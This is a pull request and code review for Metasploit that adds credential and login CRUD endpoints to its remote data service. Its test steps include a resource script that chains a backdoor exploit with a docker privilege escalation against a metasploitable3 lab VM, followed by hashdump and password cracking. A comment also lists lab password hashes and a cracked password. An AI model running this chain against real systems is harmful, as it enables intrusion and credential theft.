### PR TITLE
Implement CRUD Operations for Creds on Remote Data Service

### PR DESCRIPTION
**Pull request by jbarnett-r7**
This PR adds the remaining CRUD operations for credentials on the remote data service. It also updates the previously implemented methods, create and read, to better fit the API standards we are working towards.

Changes that were made alongside this PR:

- Added endpoints for `Metasploit::Credential::Login` model
- Updates to unique case methods from `creation.rb` in metasploit-credential. Most of the logic was moved to the data proxy and now calls the RESTful endpoints.
- Changes across various modules to route actions through the data proxy so they can go to the correct data store.
- The API documentation is also updated to reflect the changes.

## Verification

List the steps needed to make sure this thing works

### Test the creds command in the CLI
- [x] Start up `msfconsole` and `msfdb_ws`. Connect to the remote data store.
- [x] Test creating credentials: `creds add user:administrator password:password123`. Be sure to test variations on this command (see `creds -h`).
- [x] Search for specific credentials using the various flags (see `creds -h` for more examples): `creds -P password`
- [x] Delete credentials using various search terms: `creds -d -P password`

### Test login modules
- [x] Set up [metasploitable3](https://github.com/rapid7/metasploitable3) for testing against.
- [x] Test a successful login against a service
  - [x] `use auxiliary/scanner/ssh/ssh_login`
  - [x] `set RHOSTS <IP address of metasploitable3>`
  - [x] `set DB_ALL_CREDS true` to use the credential pairs stored in the database. Ensure valid credentials are displayed when running the `creds` command.
  - [x] `run`
  - [x] Verify the login attempt is displayed for the credential by running the `creds` command.
- [x] Test that logins are updated properly
  - [x] `use auxiliary/scanner/ssh/ssh_login`
  - [x] `set RHOSTS <IP address of metasploitable3>`
  - [x] `set DB_ALL_CREDS true` to use the credential pairs stored in the database. Ensure invalid credentials are displayed when running the `creds` command.
  - [x] `run`
  - [x] Verify the login attempt is displayed for the credential by running the `creds` command.
  - [x] Turn off metasploitable3 and `run` the module again to get a failed attempt.
  - [x] Verify the login attempt displays for the credential. You may need to use the API for this because it is not displayed in the UI. I recommend using the GET command under Logins at `http://localhost:8080/api/v1/api-docs`. The login record should show a `status` of `Unable to connect`

### Test JTR Modules
- [x] Create the following RC script:
```
use exploit/unix/irc/unreal_ircd_3281_backdoor
set RHOST <ip address of metasploitable3>
set RPORT 6697
exploit -z
sleep 5
sessions -u 1
sleep 5
use exploit/linux/local/docker_daemon_privilege_escalation
set SESSION 2
set LHOST 172.28.128.1
set LPORT 4445
exploit
```
- [x] Set up metasploitable3.
- [x] In console run the RC script `resource <rc script name>.rc`
- [x] You should get a root shell. Background it
- [x] `use post/linux/gather/hashdump` `set SESSION <root session ID>` `run`
- [x] `use auxiliary/analyze/jtr_linux`
- [x] Create a custom wordlist with at least `Pr0t0c07`
- [x] `set CUSTOM_WORDLIST <wordlist file name>` `set USE_DEFAULT_WORDLIST false` `set USE_ROOT_WORDS false`
- [x] `run`. It should successfully crack the `c_three_pio` hash
- [x] `creds` Verify the cracked cred is present

### Verify the content in the API docs
- [x] Start up `msfdb_ws`. Open a browser and navigate to `http://localhost:8080/api/v1/api-docs`
- [x] Verify the content for the Credentials and Logins endpoints looks and sounds grammatically correct.
- [x] Test the various endpoints using the Swagger UI to ensure they are working correctly.

### CODE REVIEW

**Comment by busterb** [comment]
This should be the last of the phase 1 data model conversions to use the new external database API. Thanks @jbarnett-r7 !

**Comment by mkienow-r7** [comment]
One of the examples listed in `creds -h` is adding a SSH key with no user `creds add ssh-key:/path/to/id_rsa`. When attempting this addition I see a failure on the `msfdb_ws` console and there is no feedback to the user in `msfconsole`.

**Example using private key**

Command: `creds add ssh-key:/path/to/id_rsa`

`msfdb_ws` console output:
```
   [-] Error handling request: Validation failed: can't have a private of type SSHKey with no associated public
    Call Stack:
   /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/validations.rb:79:in `raise_record_invalid'
   /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/validations.rb:43:in `save!'
   /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/attribute_methods/dirty.rb:29:in `save!'
   /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/transactions.rb:291:in `block in save!'
   /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/transactions.rb:351:in `block in with_transaction_returning_status'
   /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/connection_adapters/abstract/database_statements.rb:213:in `block in transaction'
   /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/connection_adapters/abstract/transaction.rb:184:in `within_new_transaction'
   /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/connection_adapters/abstract/database_statements.rb:213:in `transaction'
   /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/transactions.rb:220:in `transaction'
   /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/transactions.rb:348:in `with_transaction_returning_status'
   /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/transactions.rb:291:in `save!'
   /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/metasploit-credential-3.0.1/lib/metasploit/credential/creation.rb:264:in `block in create_credential_core'
   /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/metasploit-credential-3.0.1/lib/metasploit/credential/creation.rb:621:in `retry_transaction'
   /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/metasploit-credential-3.0.1/lib/metasploit/credential/creation.rb:256:in `create_credential_core'
   /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/metasploit-credential-3.0.1/lib/metasploit/credential/creation.rb:144:in `create_credential'
   /home/msfdev/metasploit-framework/lib/msf/core/db_manager/http/servlet/credential_servlet.rb:43:in `block (2 levels) in create_credential'
   /home/msfdev/metasploit-framework/lib/msf/core/db_manager/http/servlet_helper.rb:51:in `exec_report_job'
   /home/msfdev/metasploit-framework/lib/msf/core/db_manager/http/servlet/credential_servlet.rb:45:in `block in create_credential'
   ...
```

**Example using private key**

Command: `creds add ssh-key:/path/to/id_rsa.pub

`msfdb_ws` console output:
```
   [-] Error handling request: Validation failed: Data is not a private key., Data ArgumentError Could not parse PKey: no start line
    Call Stack:
   /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/validations.rb:79:in `raise_record_invalid'
   /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/validations.rb:43:in `save!'
   /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/attribute_methods/dirty.rb:29:in `save!'
   /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/transactions.rb:291:in `block in save!'
   /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/transactions.rb:351:in `block in with_transaction_returning_status'
   /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/connection_adapters/abstract/database_statements.rb:213:in `block in transaction'
   /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/connection_adapters/abstract/transaction.rb:184:in `within_new_transaction'
   /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/connection_adapters/abstract/database_statements.rb:213:in `transaction'
   /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/transactions.rb:220:in `transaction'
   /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/transactions.rb:348:in `with_transaction_returning_status'
   /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/transactions.rb:291:in `save!'
   /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/metasploit-credential-3.0.1/lib/metasploit/credential/creation.rb:494:in `block in create_credential_private'
   /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/metasploit-credential-3.0.1/lib/metasploit/credential/creation.rb:621:in `retry_transaction'
   /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/metasploit-credential-3.0.1/lib/metasploit/credential/creation.rb:470:in `create_credential_private'
   /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/metasploit-credential-3.0.1/lib/metasploit/credential/creation.rb:133:in `create_credential'
   /home/msfdev/metasploit-framework/lib/msf/core/db_manager/http/servlet/credential_servlet.rb:43:in `block (2 levels) in create_credential'
   /home/msfdev/metasploit-framework/lib/msf/core/db_manager/http/servlet_helper.rb:51:in `exec_report_job'
   /home/msfdev/metasploit-framework/lib/msf/core/db_manager/http/servlet/credential_servlet.rb:45:in `block in create_credential'
   ...
```

**Comment by mkienow-r7** [comment]
The `creds --type hash` command doesn't return "Nonreplayable hash" entries. The type assignment code in `creds_search` uses `Metasploit::Credential::PasswordHash` when the user provides "hash" as the type. `Metasploit::Credential::NonreplayableHash` extends `Metasploit::Credential::PasswordHash` so it seems like we should get "Nonreplayable hash" entries when listing the hash type.

**Comment by jbarnett-r7** [comment]
I haven't tested it yet, but both of these seem like they are issues that probably exist in master.

**Comment by mkienow-r7** [comment]
`creds --search-term` doesn't appear to be searching the data used for the realm column.

```
msf5 > creds --search-term admin
Credentials
===========

host  origin  service  public  private      realm      private_type
----  ------  -------  ------  -------      -----      ------------
                       admin   notpassword  workgroup  Password

msf5 > creds --search-term notpassword
Credentials
===========

host  origin  service  public  private      realm      private_type
----  ------  -------  ------  -------      -----      ------------
                       admin   notpassword  workgroup  Password

msf5 > creds --search-term Password
Credentials
===========

host  origin  service  public  private      realm      private_type
----  ------  -------  ------  -------      -----      ------------
                       admin   notpassword  workgroup  Password

msf5 > creds --search-term workgroup
Credentials
===========

host  origin  service  public  private  realm  private_type
----  ------  -------  ------  -------  -----  ------------
```

**Comment by mkienow-r7** [comment]
Searching creds based on a host address fails, for example, `creds 172.28.128.4` and `creds 172.28.128.1/24` result in the following:
```
[-] Error while running command creds: undefined method `host' for nil:NilClass

Call stack:
/home/msfdev/metasploit-framework/lib/msf/ui/console/command_dispatcher/creds.rb:448:in `block (3 levels) in creds_search'
/home/msfdev/metasploit-framework/lib/msf/ui/console/command_dispatcher/creds.rb:448:in `any?'
/home/msfdev/metasploit-framework/lib/msf/ui/console/command_dispatcher/creds.rb:448:in `block (2 levels) in creds_search'
/home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/relation/delegation.rb:46:in `each'
/home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/relation/delegation.rb:46:in `each'
/home/msfdev/metasploit-framework/lib/msf/ui/console/command_dispatcher/creds.rb:443:in `block in creds_search'
/home/msfdev/metasploit-framework/lib/msf/ui/console/command_dispatcher/creds.rb:401:in `each'
/home/msfdev/metasploit-framework/lib/msf/ui/console/command_dispatcher/creds.rb:401:in `creds_search'
/home/msfdev/metasploit-framework/lib/msf/ui/console/command_dispatcher/creds.rb:111:in `cmd_creds'
/home/msfdev/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:546:in `run_command'
/home/msfdev/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:508:in `block in run_single'
/home/msfdev/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:502:in `each'
/home/msfdev/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:502:in `run_single'
/home/msfdev/metasploit-framework/lib/rex/ui/text/shell.rb:208:in `run'
/home/msfdev/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/home/msfdev/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
./msfconsole:49:in `<main>'
```

**Comment by mkienow-r7** [comment]
When testing a successful login against a service using `auxiliary/scanner/ssh/ssh_login` I'm able to see an entry via the `/api/v1/logins` endpoint, however, I'm not seeing any entries returned when testing failed login against a service.

**Comment by mkienow-r7** [comment]
It would be nice if the `creds` command supported long help (`--help`) and long delete (`--delete`) options.

**Comment by mkienow-r7** [comment]
The Request URL generated by the API docs for the `/api/v1/credentials` GET operation always includes `&svcs=` which prevents it from simply selecting all of the creds. If I cURL the following URL from a terminal `http://<address>:<port>/api/v1/credentials?workspace=default` I have no issue retrieving all of the creds.

**Comment by jbarnett-r7** [comment]
> One of the examples listed in `creds -h` is adding a SSH key with no user `creds add ssh-

> key:/path/to/id_rsa`. When attempting this addition I see a failure on the `msfdb_ws` console and there is no feedback to the user in `msfconsole`.
> 
> **Example using private key**
> 
> Command: `creds add ssh-key:/path/to/id_rsa`
> 
> `msfdb_ws` console output:
> ```
>    [-] Error handling request: Validation failed: can't have a private of type SSHKey with no associated public
>     Call Stack:
>    /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/validations.rb:79:in `raise_record_invalid'
>    /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/validations.rb:43:in `save!'
>    /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/attribute_methods/dirty.rb:29:in `save!'
>    /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/transactions.rb:291:in `block in save!'
>    /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/transactions.rb:351:in `block in with_transaction_returning_status'
>    /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/connection_adapters/abstract/database_statements.rb:213:in `block in transaction'
>    /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/connection_adapters/abstract/transaction.rb:184:in `within_new_transaction'
>    /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/connection_adapters/abstract/database_statements.rb:213:in `transaction'
>    /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/transactions.rb:220:in `transaction'
>    /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/transactions.rb:348:in `with_transaction_returning_status'
>    /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/transactions.rb:291:in `save!'
>    /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/metasploit-credential-3.0.1/lib/metasploit/credential/creation.rb:264:in `block in create_credential_core'
>    /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/metasploit-credential-3.0.1/lib/metasploit/credential/creation.rb:621:in `retry_transaction'
>    /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/metasploit-credential-3.0.1/lib/metasploit/credential/creation.rb:256:in `create_credential_core'
>    /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/metasploit-credential-3.0.1/lib/metasploit/credential/creation.rb:144:in `create_credential'
>    /home/msfdev/metasploit-framework/lib/msf/core/db_manager/http/servlet/credential_servlet.rb:43:in `block (2 levels) in create_credential'
>    /home/msfdev/metasploit-framework/lib/msf/core/db_manager/http/servlet_helper.rb:51:in `exec_report_job'
>    /home/msfdev/metasploit-framework/lib/msf/core/db_manager/http/servlet/credential_servlet.rb:45:in `block in create_credential'
>    ...
> ```
> 
> **Example using public key**
> 
> Command: `creds add ssh-key:/path/to/id_rsa.pub`
> 
> `msfdb_ws` console output:
> ```
>    [-] Error handling request: Validation failed: Data is not a private key., Data ArgumentError Could not parse PKey: no start line
>     Call Stack:
>    /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/validations.rb:79:in `raise_record_invalid'
>    /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/validations.rb:43:in `save!'
>    /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/attribute_methods/dirty.rb:29:in `save!'
>    /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/transactions.rb:291:in `block in save!'
>    /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/transactions.rb:351:in `block in with_transaction_returning_status'
>    /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/connection_adapters/abstract/database_statements.rb:213:in `block in transaction'
>    /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/connection_adapters/abstract/transaction.rb:184:in `within_new_transaction'
>    /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/connection_adapters/abstract/database_statements.rb:213:in `transaction'
>    /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/transactions.rb:220:in `transaction'
>    /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/transactions.rb:348:in `with_transaction_returning_status'
>    /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activerecord-4.2.10/lib/active_record/transactions.rb:291:in `save!'
>    /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/metasploit-credential-3.0.1/lib/metasploit/credential/creation.rb:494:in `block in create_credential_private'
>    /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/metasploit-credential-3.0.1/lib/metasploit/credential/creation.rb:621:in `retry_transaction'
>    /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/metasploit-credential-3.0.1/lib/metasploit/credential/creation.rb:470:in `create_credential_private'
>    /home/msfdev/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/metasploit-credential-3.0.1/lib/metasploit/credential/creation.rb:133:in `create_credential'
>    /home/msfdev/metasploit-framework/lib/msf/core/db_manager/http/servlet/credential_servlet.rb:43:in `block (2 levels) in create_credential'
>    /home/msfdev/metasploit-framework/lib/msf/core/db_manager/http/servlet_helper.rb:51:in `exec_report_job'
>    /home/msfdev/metasploit-framework/lib/msf/core/db_manager/http/servlet/credential_servlet.rb:45:in `block in create_credential'
>    ...
> ```

So this actually seems to be working as intended; I think the `-h` text is just incorrect. There was [specifically a validation added](https://github.com/rapid7/metasploit-credential/blob/master/lib/metasploit/credential/core_validations.rb#L107) for this so I think it is intended there should always be a public.

**Comment by jbarnett-r7** [comment]
I found another bug. Was checking something out on the `4.x` branch and noticed that ssh keys display differently on that branch than they do in goliath code. I'll have to fix that.

```
msf > creds
Credentials
===========

host          origin  service       public                                private                                                                                             realm  private_type
----          ------  -------       ------                                -------                                                                                             -----  ------------
                                                                          66:62:f4:2d:9a:f3:4e:3b:9d:b5:d3:bb:36:53:b9:47                                                            SSH key
                                    vagrant                               vagrant                                                                                                    Password
                                    administrator                         'password123'                                                                                              Password
                                    administrator                         'password1234'                                                                                             Password
                                    administrator                         'password12345'                                                                                            Password
                                    vagrant                               $6$yTBvCpC9$9hz.H5v/HMs/cAiM1kx3ktTpfY9fzi7R87pXRpF/ibmIzE9pqZAc8Z3UljJXvbZ4Tvb.OH/1iT15SyuuDfj/R.         Nonreplayable hash
                                    leia_organa                           $1$N6DIbGGZ$LpERCRfi8IXlNebhQuYLK/                                                                         Nonreplayable hash
                                    luke_skywalker                        $1$/7D55Ozb$Y/aKb.UNrDS2w7nZVq.Ll/                                                                         Nonreplayable hash
                                    han_solo                              $1$6jIF3qTC$7jEXfQsNENuWYeO6cK7m1.                                                                         Nonreplayable hash
                                    artoo_detoo                           $1$tfvzyRnv$mawnXAR4GgABt8rtn7Dfv.                                                                         Nonreplayable hash
                                    c_three_pio                           $1$lXx7tKuo$xuM4AxkByTUD78BaJdYdG.                                                                         Nonreplayable hash
                                    ben_kenobi                            $1$5nfRD/bA$y7ZZD0NimJTbX9FtvhHJX1                                                                         Nonreplayable hash
                                    darth_vader                           $1$rLuMkR1R$YHumHRxhswnfO7eTUUfHJ.                                                                         Nonreplayable hash
                                    anakin_skywalker                      $1$jlpeszLc$PW4IPiuLTwiSH5YaTlRaB0                                                                         Nonreplayable hash
                                    jarjar_binks                          $1$SNokFi0c$F.SvjZQjYRSuoBuobRWMh1                                                                         Nonreplayable hash
                                    lando_calrissian                      $1$Af1ek3xT$nKc8jkJ30gMQWeW/6.ono0                                                                         Nonreplayable hash
                                    boba_fett                             $1$TjxlmV4j$k/rG1vb4.pj.z0yFWJ.ZD0                                                                         Nonreplayable hash
                                    jabba_hutt                            $1$9rpNcs3v$//v2ltj5MYhfUOHYVAzjD/                                                                         Nonreplayable hash
                                    greedo                                $1$vOU.f3Tj$tsgBZJbBS4JwtchsRUW0a1                                                                         Nonreplayable hash
                                    chewbacca                             $1$.qt4t8zH$RdKbdafuqc7rYiDXSoQCI.                                                                         Nonreplayable hash
                                    kylo_ren                              $1$rpvxsssI$hOBC/qL92d0GgmD/uSELx.                                                                         Nonreplayable hash
                                    c_three_pio                           Pr0t0c07                                                                                                   Password
                                    /Users/jbarnett/.ssh/id_rsa_test.pub  66:62:f4:2d:9a:f3:4e:3b:9d:b5:d3:bb:36:53:b9:47                                                            SSH key
172.28.128.3          22/tcp (ssh)  vagrant                               vagnotrant                                                                                                 Password
```

**Comment by jbarnett-r7** [comment]
> The creds --type hash command doesn't return "Nonreplayable hash" entries. The type assignment code in creds_search uses Metasploit::Credential::PasswordHash when the user provides "hash" as the type. Metasploit::Credential::NonreplayableHash extends Metasploit::Credential::PasswordHash so it seems like we should get "Nonreplayable hash" entries when listing the hash type.

This behavior is the same as `4.x`. It looks like the `type` is stored in the database as a field, so it's really just doing a text match, not actually looking at the class.

`>> Metasploit::Credential::Private.last
=> #<Metasploit::Credential::SSHKey id: 23, type: "Metasploit::Credential::SSHKey", data: "-----BEGIN RSA PRIVATE KEY-----\nMIIEpAIBAAKCAQEA5h...", created_at: "2018-07-20 20:17:19", updated_at: "2018-07-20 20:17:19", jtr_format: nil>
`

I could add another mapping to handle nonreplayable hashes if you think that would be helpful.

File: lib/metasploit/framework/data_service/stubs/credential_data_service.rb [hunk 1]
```diff
@@ -0,0 +1,18 @@
+module LoginDataService
```
Comment (mkienow-r7) [inline lib/metasploit/framework/data_service/stubs/credential_data_service.rb]: The stub module name appears to be copy-pasta from `stubs/login_data_service.rb`

**Comment by mkienow-r7** [comment]
# Release Notes

Adds the remaining CRUD operations for credentials when using a remote data service. This includes updates to the previously implemented methods, create and read, to better fit the API standards we are working towards.

**Pull request merged**